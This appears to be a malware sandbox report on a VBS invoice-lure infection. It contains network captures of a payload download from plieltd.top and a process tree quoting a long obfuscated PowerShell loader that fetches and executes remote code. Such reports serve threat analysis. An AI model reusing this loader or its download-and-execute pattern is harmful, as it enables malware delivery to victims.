2024-10-21 12:17:02 UTC | 1369 | IN | Data Raw: 58 73 51 64 58 30 33 4f 53 35 74 32 69 71 6e 5a 47 5a 4d 76 51 68 78 72 57 79 4a 43 65 46 32 43 41 77 65 36 31 44 65 46 65 42 50 6a 46 6e 39 4a 6c 72 70 35 71 39 70 47 6d 33 68 45 47 2b 56 65 6b 53 45 6b 34 38 79 35 35 75 54 33 47 5a 33 49 6c 4d 4a 31 75 4f 51 42 35 6f 64 69 4f 72 66 36 64 51 77 68 57 70 50 5a 7a 34 6c 54 33 2b 46 66 52 33 78 44 47 44 2f 4c 34 6d 37 4a 68 6e 47 72 75 50 5a 4d 5a 4d 32 53 75 2f 67 56 55 42 6b 56 47 55 54 6c 5a 6e 57 2b 36 4e 38 49 67 68 4b 38 71 6b 4f 39 62 31 46 4c 79 41 42 76 65 42 33 64 49 64 77 39 79 31 45 6a 35 31 6c 4f 62 2f 6b 7a 36 64 78 63 33 4c 48 4e 4c 42 44 68 2f 47 31 36 66 61 35 35 75 5a 49 58 78 69 45 35 35 39 36 75 45 31 57 6b 73 6d 59 31 63 55 64 38 76 35 48 31 66 30 66 63 5a 2f 6d 66 67 58 33 75 36 32 30
                                                              Data Ascii: XsQdX03OS5t2iqnZGZMvQhxrWyJCeF2CAwe61DeFeBPjFn9Jlrp5q9pGm3hEG+VekSEk48y55uT3GZ3IlMJ1uOQB5odiOrf6dQwhWpPZz4lT3+FfR3xDGD/L4m7JhnGruPZMZM2Su/gVUBkVGUTlZnW+6N8IghK8qkO9b1FLyABveB3dIdw9y1Ej51lOb/kz6dxc3LHNLBDh/G16fa55uZIXxiE5596uE1WksmY1cUd8v5H1f0fcZ/mfgX3u620
2024-10-21 12:17:02 UTC | 1369 | IN | Data Raw: 74 53 62 58 4f 6a 45 39 39 74 55 4f 71 65 4b 59 39 35 36 55 54 70 39 77 38 32 61 52 77 46 72 6d 7a 53 6d 2b 67 49 70 7a 58 73 6e 69 35 4b 49 5a 7a 37 61 45 78 2f 6f 55 55 4a 65 49 54 69 4d 2b 47 67 61 45 6f 39 61 51 30 72 62 46 65 58 6f 30 5a 70 61 33 51 47 78 78 6a 66 59 50 71 4d 65 39 6d 67 57 39 4d 5a 39 50 4e 34 72 33 55 37 34 4c 31 42 35 35 64 57 6b 48 49 31 44 44 46 4e 74 6b 51 7a 32 37 78 4b 6c 58 6a 49 38 73 73 49 4a 35 59 34 44 69 77 2f 57 75 6f 45 62 6c 78 6d 6f 33 31 6c 4b 57 5a 2b 46 41 64 78 62 6c 43 52 54 73 31 6b 72 57 74 78 2b 79 70 47 54 65 52 76 66 4b 79 70 30 30 6a 30 71 76 59 64 4d 54 6b 67 48 6c 32 2b 58 67 67 35 68 5a 2f 46 5a 31 38 77 31 4d 53 45 34 50 43 51 34 49 35 63 72 74 61 6b 4a 6b 4d 67 78 72 69 66 68 58 63 4d 43 72 2f 6e 4d
                                                              Data Ascii: tSbXOjE99tUOqeKY956UTp9w82aRwFrmzSm+gIpzXsni5KIZz7aEx/oUUJeITiM+GgaEo9aQ0rbFeXo0Zpa3QGxxjfYPqMe9mgW9MZ9PN4r3U74L1B55dWkHI1DDFNtkQz27xKlXjI8ssIJ5Y4Diw/WuoEblxmo31lKWZ+FAdxblCRTs1krWtx+ypGTeRvfKyp00j0qvYdMTkgHl2+Xgg5hZ/FZ18w1MSE4PCQ4I5crtakJkMgxrifhXcMCr/nM
2024-10-21 12:17:02 UTC | 1369 | IN | Data Raw: 53 69 50 4a 51 43 49 6d 2f 39 36 65 61 45 59 39 30 69 63 4a 52 67 2b 63 35 39 70 63 57 6b 33 67 78 4c 52 33 55 57 32 4b 46 38 30 4f 61 39 75 56 53 7a 32 50 74 5a 31 54 39 4a 6a 49 65 58 52 37 73 6e 49 76 68 71 42 4b 78 54 78 55 31 51 77 75 41 6d 6c 54 6b 56 55 42 4e 77 34 70 74 5a 57 67 6a 34 63 4e 48 63 4b 53 5a 66 69 58 67 41 62 41 73 6a 38 31 6e 63 50 43 66 55 57 77 39 5a 4c 5a 39 6f 63 37 58 2f 33 38 58 44 73 78 41 75 50 59 6b 43 6b 56 74 4a 58 4a 57 67 2b 6d 71 42 30 5a 35 56 51 58 34 58 44 59 69 53 6d 30 31 36 33 34 51 54 6c 52 72 42 47 71 38 6c 42 68 6d 69 36 74 47 63 4e 36 44 4a 5a 43 43 55 45 59 79 50 42 4e 4b 72 74 32 69 48 61 49 53 55 45 70 4c 61 72 42 48 6d 6c 50 75 54 32 62 53 55 63 68 30 47 4d 4f 33 6d 56 65 31 54 39 57 43 33 38 39 32 50 36
                                                              Data Ascii: SiPJQCIm/96eaEY90icJRg+c59pcWk3gxLR3UW2KF80Oa9uVSz2PtZ1T9JjIeXR7snIvhqBKxTxU1QwuAmlTkVUBNw4ptZWgj4cNHcKSZfiXgAbAsj81ncPCfUWw9ZLZ9oc7X/38XDsxAuPYkCkVtJXJWg+mqB0Z5VQX4XDYiSm01634QTlRrBGq8lBhmi6tGcN6DJZCCUEYyPBNKrt2iHaISUEpLarBHmlPuT2bSUch0GMO3mVe1T9WC3892P6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49744 | 172.67.155.139 | 443 | 1012 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 12:17:39 UTC | 182 | OUT | GET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: plieltd.top
Cache-Control: no-cache
2024-10-21 12:17:40 UTC | 989 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 21 Oct 2024 12:17:40 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 494656
                                                              Connection: close
                                                              Last-Modified: Mon, 21 Oct 2024 10:21:43 GMT
                                                              ETag: "78c40-624fa04f28d55"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: MISS
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Un5VCbvftvbYdlHfAzOPOjHDWcNcn%2BkE%2B6NhG6gxqSngZpnj7easPuGTJmmf5%2BOG1%2FTXeDU5zSnEp2qssN%2FDTD%2BrZpDSpXAwo%2B07ampRHWCNa9eb6%2FgcXrLNorp9LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                              X-Content-Type-Options: nosniff
                                                              Server: cloudflare
                                                              CF-RAY: 8d612f8e9de3a915-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=820&delivery_rate=2339256&cwnd=251&unsent_bytes=0&cid=4f695cf4000a8996&ts=885&x=0"
2024-10-21 12:17:40 UTC | 380 | IN | Data Raw: 6e aa 4d 06 23 14 ef 5a 60 13 a2 00 34 03 0e 15 60 0e 19 09 8e b7 fe 6f f4 b6 05 64 8f d5 59 2d 92 71 43 d8 04 da db ae 9a b7 e1 d5 25 fe 2f a7 11 f9 62 17 c5 82 2a 33 84 61 6f 5d 2f 40 d0 c6 c2 16 0b e5 30 d2 84 91 fd d6 7e 09 7e 87 42 e5 ec 46 e9 a2 58 6a 9f 4b de a5 3f c2 f4 42 ba 1f 07 48 81 54 ec 44 8a 4e 65 f4 d5 27 61 ea 9c 4a f0 26 5d c2 ae 54 e2 1d 46 e1 b9 69 11 7f 82 55 fc d3 9a 9e 2e e3 d9 1d 1b a2 1d 14 92 4b 0f 70 2d a0 2a 54 08 df 15 b9 cd 53 a1 52 9e 42 3c 44 f8 2e be e6 6d 65 39 27 06 df 49 6e 6a f6 57 d6 74 2c 8b 11 0b 04 48 c9 c8 81 a9 07 53 57 0a b8 79 72 ae 43 76 a4 12 1e 4d f6 28 e6 c9 ec d4 ea 3e 59 d2 03 61 67 ee 17 d9 2b 27 6d b3 19 3d 33 e3 34 ae d6 24 e8 20 8f f7 7d aa f1 e0 6c fc 71 ea ea 2d 4c 47 e3 6b 23 37 55 0b e2 c5 e7 fc
                                                              Data Ascii: nM#Z`4`odY-qC%/b*3ao]/@0~~BFXjK?BHTDNe'aJ&]TFiU.Kp-*TSRB<D.me9'InjWt,HSWyrCvM(>Yag+'m=34$ }lq-LGk#7U
2024-10-21 12:17:40 UTC | 1369 | IN | Data Raw: 79 15 9e c6 ad a3 2b ab a3 c5 7f 0c e5 bc 76 37 55 0a 90 0c ca d9 16 7b 02 ad 33 c0 75 aa 9d e9 ed ad 8e 51 85 4a 21 a3 44 00 0d 95 40 96 c4 7f c4 b2 93 0f 07 2a 3f 7d 42 cc 74 b0 bb a7 65 74 cc e6 73 2b d1 14 9f 0c af 37 b0 86 d8 41 af 5a a6 80 d4 39 cb ea 99 f6 90 db 69 ba e1 98 cf 6d 67 8b 00 bd c7 59 7a c3 ef 7a dc c7 a9 1e b5 0b 5c 3f 18 21 57 c6 2e 99 e7 e2 50 a2 46 03 4d 2d c6 b5 2a c3 2c 06 2d 04 ec 8a 03 f7 68 db 05 01 57 3b b4 ec 45 eb 77 09 62 77 1a b5 57 f0 85 22 b5 09 95 60 d9 19 11 04 18 33 9a fa 02 bb 42 2f d6 24 8c c3 19 2a 59 b9 9f 38 0c 73 01 9f 02 0f 3f 0a 26 31 84 e3 6d ba a1 8d 79 c6 bf c3 68 98 b8 d5 ce 17 c6 77 20 25 65 08 e1 2e 02 88 66 35 4f fb 64 7d 98 95 43 ec f2 be be 8b 38 09 88 5d b2 4e e4 c5 17 40 92 73 6f 37 0e ef 28 64 6b
                                                              Data Ascii: y+v7U{3uQJ!D@*?}Btets+7AZ9imgYzz\?!W.PFM-*,-hW;EwbwW"`3B/$*Y8s?&1myhw %e.f5Od}C8]N@so7(dk
2024-10-21 12:17:40 UTC | 1369 | IN | Data Raw: 28 c3 7b 55 3a 0c 0d 4d 46 34 55 53 13 b5 4a 9a 51 7b ea 9c 3d c0 70 c2 7e 69 a8 ad 66 1a b5 49 20 fa 87 6a 0d 2c 68 db 8b 7f 2c 62 19 0f 07 e9 55 7d f9 54 27 77 bb 4f 53 40 cc f6 1b da 51 51 8f e4 89 12 b3 86 81 82 16 42 e2 c7 d4 d1 33 e7 99 f6 f8 20 e9 ff 59 9e d9 58 60 8a 59 7e ad c9 c4 f3 b7 76 dc 2f 51 2d b5 0b 34 3a 99 64 57 2e d6 ad e4 e2 09 61 ff 2b 1e 6a 0e 66 5b cf 7c d5 43 0b 55 cf 03 1f 8a ef 06 01 0e f8 0d 5c 11 ac 77 e1 39 7b 1a b5 db 3a 02 67 ad e1 59 54 52 ca 4e c7 e1 d3 ce bd 02 53 dc 22 d6 24 e4 e0 98 ff 5c 51 29 09 0f 73 58 5c bb 77 6a 4d 26 d9 0c ee 6d ba c9 a0 f8 83 bf 2b c8 ac bb d5 97 d4 82 03 fc a5 45 4f e1 c6 7f ca 63 35 27 dc e5 38 98 0f ce d8 f1 ba e7 48 52 09 31 c5 e7 09 e4 2d 67 73 92 73 27 76 8f ca 06 fe 7f 2d 8f 4c 66 53 40
                                                              Data Ascii: ({U:MF4USJQ{=p~ifI j,h,bU}T'wOS@QQB3 YX`Y~v/Q-4:dW.a+jf[|CU\w9{:gYTRNS"$\Q)sX\wjM&m+EOc5'8HR1-gss'v-LfS@
2024-10-21 12:17:40 UTC | 1369 | IN | Data Raw: b3 7b 8c 02 d5 20 97 0c 41 38 ab 23 4f e8 33 96 fb 67 74 89 eb ad 8e da 48 a2 b1 a4 44 00 86 a8 d4 fb 8b 7f 4f 68 52 ec 02 a1 f2 2b 43 37 9c 74 bd a7 75 ff 04 1e f0 2c d1 14 06 0b 0e a7 9a c1 d8 c8 e8 5e 85 40 be 19 9c 63 de fe 19 9c 65 33 1e 66 40 2a 77 75 35 75 ed 8e 7d 3c f6 59 48 82 a9 bf 21 46 1b 3f 72 01 54 05 7e 66 d2 2a 7a e5 46 1c 5f 7d 9a cb 2a 9c 22 88 70 c7 81 01 ef 74 8c 23 61 a0 7b 3b b4 ec c4 07 ab 09 62 77 91 bd 12 f3 e8 65 ad 5a c3 53 8a 9d a8 54 33 74 9a c1 83 bf 42 2f d6 5a a3 7d c9 d1 1b b9 c9 d5 b6 58 02 9f 81 32 ef 61 61 31 7b ba 18 a0 f2 06 b6 2e fa ed 68 98 d0 65 b1 52 e8 eb 00 72 12 08 b8 78 1f a1 48 36 4f b2 e9 31 bc f7 ae fe fa ba be 00 7d 05 a5 e3 b1 4e e4 ca 93 3a 93 73 4f 7f 8d 67 07 19 8a 6f 8d 4c 3f 10 c4 ce b7 e1 ee 0b cf
                                                              Data Ascii: { A8#O3gtHDOhR+C7tu,^@ce3f@*wu5u}<YH!F?rT~f*zF_}*"pt#a{;bweZST3tB/Z}X2aa1{.heRrxH6O1}N:sOgoL?
2024-10-21 12:17:40 UTC | 1369 | IN | Data Raw: 54 28 62 c9 16 7b 68 ff 63 28 e4 26 9f e9 6e 69 9e dc 04 6e 80 a3 44 00 80 d9 64 9e 9c 97 ee b5 93 0f 6f 0a 61 3b 40 41 20 14 97 2a f9 50 40 f6 73 2b 39 65 10 0d af 77 da da 62 25 e2 1d b6 0d 98 1d b7 02 7a e7 90 db 30 31 89 fb 85 49 03 62 0a af c7 c9 24 48 33 bc 90 e3 ed f6 d8 19 5c 3f 41 71 da 8a 0a 8d 0f 83 51 a2 46 6e 06 09 4e 66 64 c2 7c d5 a6 48 f0 d2 eb b2 69 db 05 8c 1b 1f c4 04 79 ea 77 09 ef fb 3e 3d b3 23 83 ca 9d 08 95 60 dc 86 33 2c b0 c5 9b fa 02 36 0e 0b c6 cc 95 c2 19 ba e2 31 b5 7a 0c f8 c9 14 d4 e7 4b f6 d9 ce ee c3 3b 45 94 4d 53 81 bf 3c 7d f4 2c 90 ce ae 94 4e 02 5d f9 91 e0 2e f7 93 43 96 c7 c1 23 7d 39 23 6c ab f2 ec 41 be f8 23 cf 5d 11 c2 ce 82 17 73 52 d0 df 1d 49 8f a5 82 25 5e 8c ef a7 ba be 4a 3e 3a c4 4d ba 2d 51 81 af 9e f2
                                                              Data Ascii: T(b{hc(&ninDdoa;@A *P@s+9ewb%z01Ib$H3\?AqQFnNfd|Hiyw>=#`3,61zK;EMS<},N].C#}9#lA#]sRI%^J>:M-Q
                                                              2024-10-21 12:17:40 UTC1369INData Raw: ea c1 cc 3f 8f 21 54 01 20 a9 8e 51 dd 11 ab 6d ac d6 09 95 40 49 b8 5b c8 3d 5d c8 07 2d 3f 7d 40 24 e5 35 bb a7 2b b6 c4 f6 25 7c 5a e5 67 4c 50 d8 4f 0d 20 16 24 95 5e 09 d0 39 cb ba 12 38 78 f5 96 45 a6 fd 01 85 f1 8e 00 bd 4c 86 6d 4e e7 79 57 8b 8d 0e e5 e3 08 3b 18 21 dc 82 0a 95 b8 bc 92 a6 46 b5 c1 dc e6 88 d5 3c 83 85 a0 cc 3c db 07 f7 68 8b 8e cf bf cd 4a 13 ba 60 bf e1 38 73 1a b5 38 6f a7 2e fd e1 b7 64 51 ca 9c 40 7c 3b c4 38 06 bb 11 7a 80 73 07 bf 3d ae d7 60 14 f2 e4 37 05 9f 02 84 d7 81 e9 b2 f9 e3 65 c9 82 65 9e 38 40 3c e3 90 f9 84 45 d8 00 e6 b8 a2 ee 58 6a e5 1f 24 9e ca b0 bb 8c 2a 6a 18 b9 6f 36 b6 55 a3 d0 c4 75 a2 4d c5 14 4e dc 16 7a b0 b2 c8 f1 df ee 1c 02 19 8c 15 6f 1b 32 a2 1c 58 11 f5 31 1a ac 86 36 db f2 f2 79 13 68 91 fa
                                                              Data Ascii: ?!T Qm@I[=]-?}@$5+%|ZgLPO $^98xELmNyW;!F<<hJ`8s8o.dQ@|;8zs=`7ee8@<EXj$*jo6UuMNzo2X16yh
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 74 64 12 52 71 68 b0 39 33 28 8b e8 39 6f bf 49 47 b0 3b 86 c5 e7 d0 28 3f 7d ab fe f4 4c 9f b7 75 00 d3 75 8d 23 a2 0e 04 c3 47 32 4a 79 27 ca 60 d1 b6 bb 24 36 89 2c c9 9c 91 33 70 40 a6 89 22 61 e6 7c 75 b7 91 42 b2 2b f3 31 dc c7 2c e8 ea 04 c9 ff 46 e3 5f c6 c6 d7 e7 e2 50 6e 13 68 a6 7c 58 66 98 3a 83 2a a0 71 dc 07 4e 0b eb be f9 01 06 b0 7c 65 35 fb 9f f9 9c 88 e5 38 b7 53 d3 ca dd e4 6a 9f 08 93 49 8f bd 6e 58 fe 02 ed c9 de 3e 89 75 3c e6 31 5c 82 db 19 04 01 05 c1 c0 0b 3f 81 e8 d9 84 e7 6d ba 6d e5 25 98 f9 c3 80 f2 92 d6 ce db 6b 7f 61 59 11 5b 6a f7 83 d0 8b bd b6 14 9b 44 dc c3 4e 9e ec ec 35 40 d0 73 71 a2 4d c5 2f 4e e7 a8 fa 8a b0 c8 0d bf 3d 62 2b 15 d2 3a 3b 20 f8 a1 9f 94 2e 51 78 d6 44 bf 6c 50 0b 99 a3 17 e3 5e 99 88 e8 a4 a7 c7 83
                                                              Data Ascii: tdRqh93(9oIG;(?}Luu#G2Jy'`$6,3p@"a|uB+1,F_Pnh|Xf:*qN|e58SjInX>u<1\?mm%kaY[jDN5@sqM/N=b+:; .QxDlP^
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 80 4a 20 1b 1f 2d 4d 95 83 35 81 83 3b 3d ee e7 8c 5f 37 f6 1d c0 f1 eb cf bc 26 ff 03 1e a1 df 2e eb df f3 da cb 58 90 db 41 af 03 e6 68 5a d1 34 15 1a 32 9c b1 69 d0 58 fd 06 85 5f 7c ff 42 4a 8c 91 93 68 fe 34 6e 5a e1 4a 5b b4 cf 1a 21 57 9f 7e 12 28 0a 37 56 b9 1c c1 e5 e6 db 29 c3 7c 5e e4 ec 05 73 fc 08 e1 eb 56 8a 98 d3 21 17 ba 14 fc 44 96 13 93 b8 b3 23 83 22 f2 57 ce eb b4 97 d5 0c 58 59 9a 90 03 30 0f c7 3e cf 79 3c e6 d0 5c d3 9f d5 b6 10 02 9f ce 5e c0 3e 02 d9 99 17 92 45 2a 45 91 8b bf c3 68 ab 6a 97 f5 d5 65 4b ba 52 57 c2 6a ef ae 3a 09 37 b0 9f 40 71 67 93 62 e0 1a 23 56 74 c7 8a 4c 51 70 46 e4 af 16 bf e6 57 43 c8 7a ab 0a fe 8b f1 73 b3 bc 54 f5 88 95 a6 07 14 ba d2 44 b8 d3 c5 f2 71 5f 4a 21 5a 12 15 eb a8 2c 08 e9 77 04 12 ee fd 18
                                                              Data Ascii: J -M5;=_7&.XAhZ42iX_|BJh4nZJ[!W~(7V)|^sV!D#"WXY0>y<\^>E*EhjeKRWj:7@qgb#VtLQpFWCzsTDq_J!Z,w
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 71 b1 50 3d d4 44 1b c1 b2 84 c9 c2 ef 89 bf 33 4d 08 cf b1 1f 75 9b 7d bd c3 ce e2 70 f3 2b e7 c4 8e 8b ca 61 b2 32 76 2b c6 94 b4 c2 34 94 db 3c 31 b5 27 9f e0 26 9e 8b 4c 97 44 30 d3 0b bc dc c7 a9 9a 75 7f 77 b2 5d 29 07 4b 63 95 0f 40 50 a2 46 b3 c7 68 f2 05 e4 93 94 67 da fb 2b da 8e ba 60 33 88 01 57 3b e4 67 8b 03 c8 ff 9d 88 f1 8a 3e 66 93 72 20 44 81 88 d3 ca 17 04 08 be d7 ea ea d2 42 2f d6 74 01 86 11 ea d1 f4 93 d5 6d 73 01 9f 52 82 7a f6 ad ff d4 0b 1c 4b 5e 72 29 4b f2 cb 80 d4 b8 d5 ce 47 63 cd ad 85 12 08 e1 a5 31 a7 e8 d0 12 29 74 7d f2 18 2c ec 0d ce 9a 9b 69 e1 55 59 b2 4e 26 cd 17 a9 a7 9f b0 c8 85 cb 22 12 84 10 b7 44 30 04 39 88 99 a6 65 0b 31 9e 60 ed 10 da 23 89 9d 17 e3 b7 fc 03 33 57 c5 8e bd 9f 1c 99 ef 76 0d 78 c9 cf 30 1b f0
                                                              Data Ascii: qP=D3Mu}p+a2v+4<1'&LD0uw])Kc@PFhg+`3W;g>fr DB/tmsRzK^r)KGc1)t},iUYN&"D09e1`#3Wvx0
                                                              2024-10-21 12:17:40 UTC1369INData Raw: dc 3d 5d 0c c0 7a d7 4a aa 33 8b 33 ff 83 69 77 0f a6 9b 20 0f eb 70 8f 6b 2b e3 79 ac 65 8f d1 78 68 c8 d3 34 15 9a b2 b4 c7 39 52 87 ab 36 92 e0 4e 0c 36 09 9c 95 d9 12 ce 23 98 22 d8 e8 55 07 fd 08 21 dc 08 c6 cc 17 1d af 6e 15 b5 1d 47 0e 05 db 2b 50 25 d4 fb 5f d6 27 ef e3 97 21 15 04 d3 aa 1c ba 14 88 7d 46 6b 91 f9 97 3b d0 ca e6 f8 6a 9f da 04 9c fc b0 8f 73 05 fd 32 06 0b ce af 9c 48 d3 4d 8d 82 50 32 8a f8 01 9f 02 5a b2 26 1c b4 7b 97 17 d0 a1 d8 f2 08 57 80 98 67 47 51 0e 63 84 88 01 79 0d 83 2f d1 c7 11 f3 dc b0 14 34 f6 56 0f ce 05 0d 45 bd 4c 68 e1 e8 80 4d b1 67 01 1b 17 a9 07 6b 2b 7b ae 8d d8 e7 76 65 b3 c0 1d f5 71 18 7d e1 4f 63 59 8a ea f8 8b 1a 2c b6 ec 1c 0e fa cb 11 57 d3 e3 a1 14 50 36 f2 15 0d b5 32 1b 32 1a 7f e2 27 ea 5a f5 6a
                                                              Data Ascii: =]zJ33iw pk+yexh49R6N6#"U!nG+P%_'!}Fk;js2HMP2Z&{WgGQcy/4VELhMgk+{veq}OcY,WP622'Zj

                                                              Target ID:0
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                                                              Imagebase:0x7ff620550000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping gormezl_6777.6777.6777.677e
                                                              Imagebase:0x7ff72db70000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:08:16:57
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. 
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. 
RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L 
